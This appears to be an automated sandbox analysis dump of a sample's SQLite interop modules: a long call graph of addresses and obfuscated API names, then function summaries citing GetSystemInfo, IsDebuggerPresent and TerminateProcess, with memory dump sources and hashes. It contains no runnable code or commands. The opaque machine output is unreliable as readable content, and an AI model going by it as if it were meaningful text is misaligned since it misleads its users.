SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d 84177->84210 84178 6bc8273a 84182 6bbd1186 __except_handler4 5 API calls 84178->84182 84179->83976 84180->84174 84180->84177 84180->84189 84192 6bc8261e 84180->84192 84193 6bc82567 84180->84193 84184 6bc8274c 84182->84184 84183 6bc82551 84185 6bbd1186 __except_handler4 5 API calls 84183->84185 84184->83976 84186 6bc82563 84185->84186 84186->83976 84187 6bc826c6 84214 6bc6c500 SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d RtlAllocateHeap SI769271af19a2299d 84187->84214 84190 6bc82642 84189->84190 84204 6bc68b20 84189->84204 84190->84173 84190->84174 84191 6bc825ed 84191->84190 84191->84192 84212 6bc7b2b0 21 API calls 2 library calls 84191->84212 84192->84187 84192->84190 84213 6bc0fbb0 SIaa0f8e0c251cfd1d 84192->84213 84193->84174 84193->84191 84211 6bc527e0 SI769271af19a2299d 84193->84211 84198 6bc6c4bf 84197->84198 84199 6bc6c49b 84197->84199 84198->83980 84199->84198 84246 6bc68780 84199->84246 84201->83984 84202->83975 84203->83974 84205 6bc68b3f 84204->84205 84216 6bc68460 84205->84216 84207 6bc68b4f 84207->84207 84208 6bc069f0 SIaa0f8e0c251cfd1d 84207->84208 84209 6bc68b87 84207->84209 84208->84209 84209->84190 84210->84183 84211->84191 84212->84192 84213->84187 84214->84189 84215->84178 84219 6bc68472 84216->84219 84220 6bc68514 84219->84220 84221 6bc60bf0 84219->84221 84235 6bc1c450 17 API calls __except_handler4 84219->84235 84220->84207 84222 6bc60c01 84221->84222 84224 6bc60c0d 84222->84224 84236 6bc1c820 84222->84236 84225 6bc60c53 84224->84225 84231 6bc60d87 84224->84231 84242 6bc05bc0 5 API calls __except_handler4 84224->84242 84228 6bc60cf5 84225->84228 84229 6bc1c820 4 API calls 84225->84229 84232 6bc60c6c 84225->84232 84227 6bc60d64 SI769271af19a2299d 84227->84231 84228->84232 84243 6bc05bc0 5 API calls __except_handler4 84228->84243 84229->84228 84231->84219 84232->84227 84232->84231 84233 6bc60d18 84233->84232 84244 6bc5aad0 14 API calls 4 library calls 84233->84244 84235->84219 84237 6bc1c833 84236->84237 84239 6bc1c846 _memset 84236->84239 84245 6bc14f90 SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d RtlAllocateHeap SI769271af19a2299d 84237->84245 84240 6bc12f30 3 API calls 84239->84240 84241 6bc1c84f _memset 84239->84241 84240->84241 84241->84224 84242->84225 84243->84233 84244->84232 84245->84239 84247 6bc6878b 84246->84247 84249 6bc687c2 84247->84249 84250 6bc1c700 84247->84250 84249->84198 84251 6bc1c724 84250->84251 84253 6bc1c79d 84250->84253 84252 6bc13b30 3 API calls 84251->84252 84254 6bc1c72b _memset 84252->84254 84253->84249 84254->84253 84255 6bc1c7df SIaa0f8e0c251cfd1d 84254->84255 84255->84249 84265 6bc46260 84256->84265 84258 6bc264e8 84259 6bc264fd 84258->84259 84283 6bc293c0 10 API calls 84258->84283 84261 6bbd1186 __except_handler4 5 API calls 84259->84261 84263 6bc2650e SIc14fb8a21feb2e94 84261->84263 84262 6bc264be 84262->84258 84282 6bc1d460 10 API calls 84262->84282 84263->83935 84280 6bc462a6 _memset __aulldiv __aullrem __aulldvrm 84265->84280 84266 6bc47850 84267 6bbd1186 __except_handler4 5 API calls 84266->84267 84268 6bc47871 84267->84268 84268->84262 84269 6bc4781e 84269->84266 84270 6bc47827 84269->84270 84284 6bc33cf0 10 API calls 84270->84284 84272 6bc47838 84273 6bbd1186 __except_handler4 5 API calls 84272->84273 84274 6bc4784c 84273->84274 84274->84262 84275 6bc1d500 10 API calls 84275->84280 84276 6bc33cf0 10 API calls 84276->84280 84277 6bc47809 84278 6bbd1186 __except_handler4 5 API calls 84277->84278 84279 6bc4781a 84278->84279 84279->84262 84280->84266 84280->84269 84280->84275 84280->84276 84280->84277 84281 6bc32140 10 API calls 84280->84281 84281->84280 84282->84258 84283->84259 84284->84272 83144 52b5a38 83145 52b5a79 83144->83145 83146 52b5a84 SI2102da665922f66a 83145->83146 83147 52b5ab1 83145->83147 83146->83147 83148 52b9eb8 83149 52b9ec8 83148->83149 83152 52b9ee8 83149->83152 83150 52b9ed4 83153 52b9f01 83152->83153 83156 52b6f5c 83153->83156 83155 52b9f08 83155->83150 83158 52b6f67 83156->83158 83157 52b7ea5 83157->83155 83158->83157 83161 52b818f 83158->83161 83165 52b81a0 83158->83165 83162 52b81a0 83161->83162 83169 52b3790 83162->83169 83164 52b83d2 83167 52b81c5 83165->83167 83166 52b3790 315 API calls 83168 52b83d2 83166->83168 83167->83166 83170 52b379b 83169->83170 83172 52b37a1 83169->83172 83170->83164 83171 52b37df 83171->83164 83172->83171 83175 6bce19f0 83172->83175 83173 52b3890 83173->83164 83176 6bce19fb 83175->83176 83177 6bce1a05 GetCurrentProcessId 83175->83177 83176->83173 83178 6bce1a1e 83177->83178 83179 6bce1a5a 83177->83179 83184 6bcdce00 83178->83184 83179->83173 83181 6bce1a30 83182 6bce1a51 83181->83182 83252 6bc642d0 22 API calls 83181->83252 83182->83173 83185 6bcdce1d SI769271af19a2299d 83184->83185 83186 6bcdce45 83184->83186 83185->83181 83253 6bcc5630 83186->83253 83188 6bcdd315 83188->83181 83189 6bcdce4c 83189->83188 83190 6bc12f30 3 API calls 83189->83190 83202 6bcdcecf _memset 83189->83202 83190->83202 83191 6bcdd2c1 SIccd01f4d70f48acf 83193 6bcdd2da 83191->83193 83194 6bcdd2d1 83191->83194 83192 6bcdcf56 83264 6bc52870 83192->83264 83196 6bcdd308 83193->83196 83336 6bc6f960 206 API calls __except_handler4 83193->83336 83335 6bc87000 87 API calls 83194->83335 83337 6bc045c0 SIaa0f8e0c251cfd1d 83196->83337 83198 6bcdcf43 SIaa0f8e0c251cfd1d 83231 6bcdd165 83198->83231 83201 6bcdd03a 83203 6bc52870 17 API calls 83201->83203 83202->83191 83202->83192 83202->83198 83204 6bcdd050 83203->83204 83205 6bc52870 17 API calls 83204->83205 83206 6bcdd066 83205->83206 83207 6bc52870 17 API calls 83206->83207 83208 6bcdd07c 83207->83208 83209 6bc52870 17 API calls 83208->83209 83210 6bcdd092 83209->83210 83211 6bcdd0c6 83210->83211 83212 6bcdd0b6 83210->83212 83210->83231 83324 6bc19dc0 15 API calls 83211->83324 83323 6bc52810 SI769271af19a2299d 83212->83323 83215 6bcdd0c0 83216 6bcdd0ee 83215->83216 83217 6bcdd127 83215->83217 83219 6bcdd0f9 83216->83219 83325 6bc293c0 10 API calls 83216->83325 83277 6bc85d80 83217->83277 83326 6bc3df00 11 API calls 83219->83326 83220 6bcdd144 83223 6bcdd178 83220->83223 83224 6bcdd14b 83220->83224 83310 6bc2f280 83223->83310 83226 6bcdd15e 83224->83226 83227 6bcdd16a 83224->83227 83225 6bcdd119 SIaa0f8e0c251cfd1d 83225->83231 83327 6bc12ea0 SIaa0f8e0c251cfd1d 83226->83327 83328 6bc12770 SIaa0f8e0c251cfd1d 83227->83328 83231->83191 83232 6bcdd18f 83233 6bc2f280 10 API calls 83232->83233 83234 6bcdd1c7 83233->83234 83234->83231 83235 6bcdd211 83234->83235 83329 6bc12770 SIaa0f8e0c251cfd1d 83234->83329 83319 6bcd6630 SI7e899b5a8ad87eab 83235->83319 83239 6bcdd24e 83241 6bcdd27a 83239->83241 83242 6bcdd255 83239->83242 83240 6bcdd232 83240->83239 83246 6bcdd262 83240->83246 83332 6bc12770 SIaa0f8e0c251cfd1d 83241->83332 83330 6bc12ea0 SIaa0f8e0c251cfd1d 83242->83330 83245 6bcdd25c 83333 6bc13fa0 SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d RtlAllocateHeap SI769271af19a2299d __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 83245->83333 83331 6bc40480 11 API calls 83246->83331 83249 6bcdd268 SIccd01f4d70f48acf 83249->83231 83249->83245 83250 6bcdd299 83334 6bc6fbf0 SI769271af19a2299d SI769271af19a2299d SI769271af19a2299d SI769271af19a2299d SI769271af19a2299d 83250->83334 83252->83182 83254 6bcc5641 83253->83254 83255 6bcc5649 83253->83255 83254->83189 83257 6bcc5772 83255->83257 83258 6bcc5697 _memset 83255->83258 83338 6bc5b260 83255->83338 83257->83189 83258->83257 83259 6bcc5752 83258->83259 83352 6bc61020 SI9dbf9d88aa001ea6 83258->83352 83259->83257 83343 6bc6f690 83259->83343 83262 6bcc5767 83262->83257 83353 6bc5b180 10 API calls 83262->83353 83265 6bc52888 83264->83265 83267 6bc5288d 83264->83267 83266 6bc52a15 SI769271af19a2299d 83265->83266 83265->83267 83266->83201 83268 6bc52904 83267->83268 83276 6bc52923 83267->83276 83375 6bc3df00 11 API calls 83268->83375 83271 6bc5299d 83272 6bc529bd 83271->83272 83377 6bc12770 SIaa0f8e0c251cfd1d 83271->83377 83272->83201 83273 6bc52915 83273->83201 83275 6bc529fe 83275->83201 83276->83271 83376 6bc2c8b0 15 API calls 83276->83376 83279 6bc85dc3 83277->83279 83278 6bc12f30 3 API calls 83284 6bc85e7b _memset 83278->83284 83279->83278 83279->83284 83280 6bc85f55 83413 6bbd1186 83280->83413 83282 6bc85f6b 83282->83220 83283 6bc12f30 3 API calls 83286 6bc86158 _memset 83283->83286 83284->83280 83284->83284 83285 6bc86129 83284->83285 83287 6bc85f30 83284->83287 83289 6bc13b30 3 API calls 83284->83289 83285->83283 83285->83286 83305 6bc8618b 83286->83305 83378 6bc82770 83286->83378 83291 6bc85f4c SIaa0f8e0c251cfd1d 83287->83291 83294 6bc85f6f 83287->83294 83289->83287 83290 6bc863fc SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d 83304 6bc86484 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 83290->83304 83291->83280 83293 6bbd1186 __except_handler4 5 API calls 83295 6bc86575 83293->83295 83296 6bc85fe2 SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d 83294->83296 83303 6bc85f76 83294->83303 83295->83220 83297 6bbd1186 __except_handler4 5 API calls 83296->83297 83299 6bc86007 83297->83299 83298 6bc860bf SIaa0f8e0c251cfd1d 83298->83285 83298->83305 83299->83220 83301 6bc86215 83301->83305 83402 6bc68990 83301->83402 83303->83298 83308 6bc86198 SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d 83303->83308 83304->83293 83305->83290 83305->83304 83421 6bc68820 83305->83421 83307 6bbd1186 __except_handler4 5 API calls 83309 6bc861e8 83307->83309 83308->83307 83309->83220 83311 6bc2f2a0 83310->83311 83312 6bc2f28c 83310->83312 83314 6bc12f30 3 API calls 83311->83314 83318 6bc2f299 _memset 83311->83318 83462 6bc1c0e0 SIaa0f8e0c251cfd1d RtlAllocateHeap SI769271af19a2299d _memset 83312->83462 83314->83318 83315 6bc2f319 83315->83232 83317 6bc2f2ff 83317->83232 83318->83315 83463 6bc293c0 10 API calls 83318->83463 83320 6bcd664c SIccd01f4d70f48acf 83319->83320 83321 6bcd6646 83319->83321 83320->83239 83320->83240 83464 6bc293c0 10 API calls 83321->83464 83323->83215 83324->83215 83325->83219 83326->83225 83327->83231 83328->83231 83329->83235 83330->83245 83331->83249 83332->83245 83333->83250 83334->83231 83335->83193 83336->83196 83337->83188 83339 6bc5b269 SI9dbf9d88aa001ea6 83338->83339 83340 6bc5b278 83338->83340 83339->83340 83354 6bc51b10 83340->83354 83341 6bc5b2d3 83341->83258 83344 6bcc5630 9 API calls 83343->83344 83345 6bc6f69b 83344->83345 83346 6bc6f6ae 83345->83346 83347 6bc13b30 3 API calls 83345->83347 83346->83262 83348 6bc6f6a7 83347->83348 83348->83346 83349 6bc6f6b7 SIaa0f8e0c251cfd1d 83348->83349 83361 6bc6f1a0 GetSystemInfo 83349->83361 83352->83259 83353->83257 83355 6bc51b1b 83354->83355 83357 6bc51b21 83354->83357 83355->83341 83356 6bc51b70 83356->83341 83357->83356 83358 6bc51b3d HeapCreate 83357->83358 83358->83356 83359 6bc51b4d SI769271af19a2299d 83358->83359 83359->83341 83370 6bc55ff0 83361->83370 83363 6bc6f1e7 83364 6bc55ff0 9 API calls 83363->83364 83365 6bc6f1f3 83364->83365 83366 6bc55ff0 9 API calls 83365->83366 83367 6bc6f1ff 83366->83367 83368 6bc55ff0 9 API calls 83367->83368 83369 6bc6f20b 83368->83369 83369->83262 83371 6bcc5630 9 API calls 83370->83371 83372 6bc55ffa 83371->83372 83373 6bc56009 SI769271af19a2299d 83372->83373 83374 6bc5602e 83372->83374 83373->83363 83374->83363 83375->83273 83376->83271 83377->83275 83379 6bc827b6 83378->83379 83381 6bc8290b 83379->83381 83387 6bc827e1 83379->83387 83390 6bc82805 83379->83390 83380 6bc82a40 83383 6bc82a50 83380->83383 83384 6bc82a47 SIaa0f8e0c251cfd1d 83380->83384 83385 6bc13b30 3 API calls 83381->83385 83389 6bc82938 83381->83389 83381->83390 83382 6bc13b30 3 API calls 83386 6bc82876 83382->83386 83383->83301 83384->83383 83385->83389 83386->83380 83391 6bc82883 _memset 83386->83391 83388 6bc13b30 3 API calls 83387->83388 83387->83390 83388->83390 83389->83383 83389->83390 83393 6bc82a2b SIaa0f8e0c251cfd1d 83389->83393 83435 6bc527e0 SI769271af19a2299d 83389->83435 83390->83380 83390->83382 83390->83383 83392 6bc82ac7 SIaa0f8e0c251cfd1d 83391->83392 83400 6bc82ad3 83391->83400 83392->83400 83393->83301 83394 6bc68990 3 API calls 83397 6bc82bf2 83394->83397 83401 6bc82c35 83397->83401 83436 6bc067f0 83397->83436 83398 6bc82a1e 83398->83390 83398->83393 83400->83394 83400->83397 83401->83301 83404 6bc689ab 83402->83404 83403 6bc68a18 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 83403->83305 83404->83403 83405 6bc14a90 3 API calls 83404->83405 83407 6bc68a07 83404->83407 83406 6bc689ff 83405->83406 83406->83407 83440 6bc0fbb0 SIaa0f8e0c251cfd1d 83406->83440 83410 6bc067f0 SIaa0f8e0c251cfd1d 83407->83410 83409 6bc68a85 83409->83407 83411 6bc68a9e 83409->83411 83410->83403 83412 6bc067f0 SIaa0f8e0c251cfd1d 83411->83412 83412->83403 83414 6bbd118e 83413->83414 83415 6bbd1190 IsDebuggerPresent 83413->83415 83414->83282 83441 6bbda96f 83415->83441 83418 6bbd3503 SetUnhandledExceptionFilter UnhandledExceptionFilter 83419 6bbd3528 GetCurrentProcess TerminateProcess 83418->83419 83420 6bbd3520 __call_reportfault 83418->83420 83419->83282 83420->83419 83422 6bc6883c 83421->83422 83442 6bc63ea0 83422->83442 83427 6bc688c7 83454 6bc11530 SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d 83427->83454 83430 6bc688d0 83455 6bc12570 25 API calls 83430->83455 83431 6bc688ce 83432 6bc067f0 SIaa0f8e0c251cfd1d 83431->83432 83434 6bc68952 SIaa0f8e0c251cfd1d 83432->83434 83434->83290 83435->83398 83438 6bc06808 SIaa0f8e0c251cfd1d 83436->83438 83439 6bc067f8 83436->83439 83437 6bc06898 SIaa0f8e0c251cfd1d 83437->83438 83438->83301 83439->83437 83439->83438 83440->83409 83441->83418 83443 6bc63fc6 83442->83443 83444 6bc63eba 83442->83444 83450 6bc069f0 83443->83450 83447 6bc63f34 83444->83447 83456 6bc639c0 24 API calls _memset 83444->83456 83445 6bc63fb1 SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d 83445->83443 83447->83445 83448 6bc63f03 83448->83447 83457 6bc51a10 SI769271af19a2299d 83448->83457 83451 6bc06ad9 83450->83451 83452 6bc06a01 _memset 83450->83452 83451->83427 83451->83430 83458 6bc11800 83452->83458 83454->83431 83455->83431 83456->83448 83457->83447 83459 6bc11810 83458->83459 83460 6bc0fc70 SIaa0f8e0c251cfd1d 83459->83460 83461 6bc11829 83459->83461 83460->83461 83461->83451 83462->83318 83463->83317 83464->83320 84285 52b7518 84286 52b7525 84285->84286 84289 52b6ec4 84286->84289 84290 52b6ecf 84289->84290 84293 52b6ee4 84290->84293 84294 52b6eef 84293->84294 84295 52b752e 84294->84295 84296 52b7c28 377 API calls 84294->84296 84296->84295 83465 6bc5b0d0 83466 6bc5b0f1 83465->83466 83468 6bc5b12f 83466->83468 83469 6bc55c00 83466->83469 83470 6bc55c24 83469->83470 83472 6bc55c33 wcstoxq 83469->83472 83473 6bc55370 SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d RtlAllocateHeap SI769271af19a2299d SI769271af19a2299d 83470->83473 83472->83468 83473->83472 84297 6bc67e70 84298 6bc67e75 84297->84298 84299 6bc67eea 84298->84299 84300 6bc67eee SI769271af19a2299d 84298->84300 84301 6bc60ad0 7 API calls 84298->84301 84300->84299 84301->84298 84302 6bc88eb0 84307 6bc88ed1 84302->84307 84303 6bc88f2d 84304 6bc89148 84304->84303 84315 6bc22030 SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d RtlAllocateHeap SI769271af19a2299d _memset 84304->84315 84306 6bc859e0 35 API calls 84306->84307 84307->84303 84307->84304 84307->84306 84309 6bc890c8 84307->84309 84312 6bc609e0 19 API calls _memset 84307->84312 84313 6bc12570 25 API calls 84307->84313 84309->84303 84309->84304 84314 6bc33c90 18 API calls 84309->84314 84312->84307 84313->84307 84314->84304 84315->84303 83474 52babf0 83475 52bac16 83474->83475 83476 52bad2e 83474->83476 83475->83476 83478 52bb450 83475->83478 83479 52bb47d 83478->83479 83481 52bb623 83479->83481 83484 52bbad8 83479->83484 83480 52bb5f9 83489 52bca88 83480->83489 83481->83476 83486 52bbaee 83484->83486 83485 52bbaf2 83485->83480 83486->83485 83494 52bc754 83486->83494 83499 52bc760 83486->83499 83491 52bca9b 83489->83491 83490 52bcab4 83490->83481 83491->83490 83492 52bcbd6 _SI074a26a6bce53634 83491->83492 83493 52bcc05 83492->83493 83493->83481 83495 52bc6ec 83494->83495 83496 52bc75e 83494->83496 83495->83485 83497 52bc902 83496->83497 83503 52b7c28 83496->83503 83500 52bc782 83499->83500 83501 52bc902 83500->83501 83502 52b7c28 377 API calls 83500->83502 83502->83500 83504 52b7c48 83503->83504 83505 52b6f5c 315 API calls 83504->83505 83506 52b7c4f 83505->83506 83507 52b7cae 83506->83507 83511 52b9122 83506->83511 83518 52b9078 83506->83518 83526 52b9088 83506->83526 83507->83496 83514 52b90f1 83511->83514 83515 52b9207 83511->83515 83512 52b9144 83512->83506 83514->83511 83514->83512 83514->83515 83533 52b7060 83514->83533 83537 6bcc0600 83515->83537 83516 52b937f 83516->83506 83519 52b9069 83518->83519 83522 52b9086 83518->83522 83519->83506 83520 52b7060 146 API calls 83520->83522 83521 52b9144 83521->83506 83522->83520 83522->83521 83523 52b9207 83522->83523 83525 6bcc0600 146 API calls 83523->83525 83524 52b937f 83524->83506 83525->83524 83529 52b90b6 83526->83529 83527 52b7060 146 API calls 83527->83529 83528 52b9144 83528->83506 83529->83527 83529->83528 83530 52b9207 83529->83530 83532 6bcc0600 146 API calls 83530->83532 83531 52b937f 83531->83506 83532->83531 83534 52b9328 83533->83534 83535 52b937f 83534->83535 83536 6bcc0600 146 API calls 83534->83536 83535->83514 83536->83535 83538 6bcc061c 83537->83538 83539 6bcc0615 SI769271af19a2299d SI769271af19a2299d 83537->83539 83538->83539 83541 6bcc065f 83538->83541 83539->83516 83556 6bcc0420 83541->83556 83543 6bcc06cc 83543->83516 83545 6bcc06ce 83576 6bc43690 11 API calls 83545->83576 83546 6bcc0676 83546->83543 83546->83545 83551 6bcc0420 135 API calls 83546->83551 83574 6bcb82c0 144 API calls 83546->83574 83575 6bc97aa0 135 API calls 83546->83575 83549 6bcc06de 83550 6bcc06f3 83549->83550 83577 6bc07640 SIaa0f8e0c251cfd1d 83549->83577 83550->83543 83578 6bc1d5a0 10 API calls 83550->83578 83551->83546 83554 6bcc0702 83579 6bc12ec0 SIaa0f8e0c251cfd1d 83554->83579 83557 6bcc043f 83556->83557 83568 6bcc04a8 83556->83568 83558 6bcc046e 83557->83558 83557->83568 83586 6bc97aa0 135 API calls 83557->83586 83562 6bcc0476 83558->83562 83558->83568 83559 6bcc052d 83580 6bcb9a00 83559->83580 83560 6bcc0524 83588 6bc3dc00 12 API calls 83560->83588 83561 6bcc05c6 83561->83546 83562->83561 83587 6bc40f90 11 API calls 83562->83587 83567 6bcc0498 83567->83546 83568->83559 83568->83560 83569 6bcc054f 83569->83546 83570 6bcc052b 83570->83569 83571 6bcc0581 83570->83571 83589 6bc40f90 11 API calls 83570->83589 83571->83561 83590 6bc12ec0 SIaa0f8e0c251cfd1d 83571->83590 83574->83546 83575->83546 83576->83549 83577->83550 83578->83554 83579->83543 83581 6bcb9a6a 83580->83581 83585 6bcb9ab3 83581->83585 83591 6bc293c0 10 API calls 83581->83591 83583 6bcbfeb3 83592 6bc28cc0 10 API calls 83583->83592 83586->83557 83587->83567 83588->83570 83589->83571 83590->83561 83591->83583 83592->83585 84316 52b9450 84317 52b9467 84316->84317 84318 52b6f5c 315 API calls 84317->84318 84319 52b946e 84318->84319 84320 52b38d0 84323 6bc97dd0 84320->84323 84324 6bc97b50 147 API calls 84323->84324 84325 52b3927 84324->84325
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC85EA2
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC85F4D
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC85FE3
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC85FEC
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC86116
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC8617B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.$_memset
                                                                                                                                                                                                                                      • String ID: :memory:
                                                                                                                                                                                                                                      • API String ID: 1480580083-2920599690
                                                                                                                                                                                                                                      • Opcode ID: 52d2ab81efffb31b503afa73474db52af4e1c5b2d02127ee93bb1e4996dea6ac
                                                                                                                                                                                                                                      • Instruction ID: 6916b221dc6f0f0e6146cd8bb43637fe656a1668a6151ec6c66a32a90905ee32
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52d2ab81efffb31b503afa73474db52af4e1c5b2d02127ee93bb1e4996dea6ac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA32C4B0A297419FE701CF28C88171ABBE1BF8530CF0445B9E9599B242F77DDA45CB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI6039a77d8b3fe4a1.SQLITE.INTEROP ref: 052BDC80
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2184837156.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_52b0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I6039a77d8b3fe4a1.
                                                                                                                                                                                                                                      • String ID: LR]q
                                                                                                                                                                                                                                      • API String ID: 3315335696-3081347316
                                                                                                                                                                                                                                      • Opcode ID: 3f98482f4a6627c81142d175759724a5271d2e3453c5d4c7b997f953bce02c58
                                                                                                                                                                                                                                      • Instruction ID: 0d6f627a3c1813a681589a20810d10156a8cae4ec41f9301c327289acbfd8105
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f98482f4a6627c81142d175759724a5271d2e3453c5d4c7b997f953bce02c58
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D925A31A205568FDB10DF58C4C4BADB7B2FF84300F19CA69D4599B64AC779EC82CB94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(6BD1A0BC,?,6BC6F6C5,?,?,6BCC5767), ref: 6BC6F1D5
                                                                                                                                                                                                                                        • Part of subcall function 6BC55FF0: SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000062A9,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,?,6BC6F1E7,6BD15CA8,00000001,?,6BC6F6C5,?,?,6BCC5767), ref: 6BC5601F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.InfoSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4045177776-0
                                                                                                                                                                                                                                      • Opcode ID: 661395a425f8f2c6590b2d8329beff0bf02331da9dd1d339b140f0373d7978b5
                                                                                                                                                                                                                                      • Instruction ID: 2616bfe662f5192767f861b9fbd8d58c490a0ead5810e50d205ddd7f0daeb3df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 661395a425f8f2c6590b2d8329beff0bf02331da9dd1d339b140f0373d7978b5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 310162B18192009EFF40CF749D07710BAE9B706319F90017AF229DE288F73D911D8B25
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2162251699.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_12ed000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4c1cf3d327d68f2473b541de04f011dc7bd90428a7a8c60d7e054c326a09403f
                                                                                                                                                                                                                                      • Instruction ID: 4b2e8c7c1e6ce55dd49597459d8087b4df20762881c4275f9ddc983fdb6642d7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c1cf3d327d68f2473b541de04f011dc7bd90428a7a8c60d7e054c326a09403f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87913F7585A3C18FD7438B74E8562963FF0AF13321B5E41EBD844CF0A3E269485ACB62
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2163193742.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_2cc0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b6718debf91c391b8758a17abb510c112d02292b5e95f1845b256c3b5c934566
                                                                                                                                                                                                                                      • Instruction ID: d988237c62d0228f55557455d95875d917b8d9ae336cd04db860c605c7e0da58
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6718debf91c391b8758a17abb510c112d02292b5e95f1845b256c3b5c934566
